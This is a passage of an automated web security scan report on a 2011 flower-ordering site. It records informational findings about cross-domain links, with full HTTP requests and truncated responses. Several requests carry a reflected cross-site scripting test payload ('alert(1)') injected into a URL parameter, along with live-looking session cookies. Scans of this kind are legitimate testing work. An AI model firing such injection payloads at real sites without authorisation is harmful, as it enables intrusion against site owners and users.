<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl00_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl01_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Checked.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="SectionContainer">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="LargeMiscColumn">
   
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessagepreview.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>

   <body id="ctl00_OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Checked.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Complete.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="TopSpacer" style="margin-bottom: 10px;"> <img border="0" alt="5 Brands 1 Login" class="consIcon" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/proplants/images/PRVD_76x30_5brands_1login_onWhite.gif" style="border-width:0px;" /> <input type="submit" name="ctl00$OrderProcessPageBody$ctl05$_submitLoginInformationBtn" value="Sign In >
...[SNIP]...
<div class="consBanner"> <img border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/proplants/images/PRVD_558x74_5brands_1login.jpg" style="border-width:0px;" /> </div>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...
16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


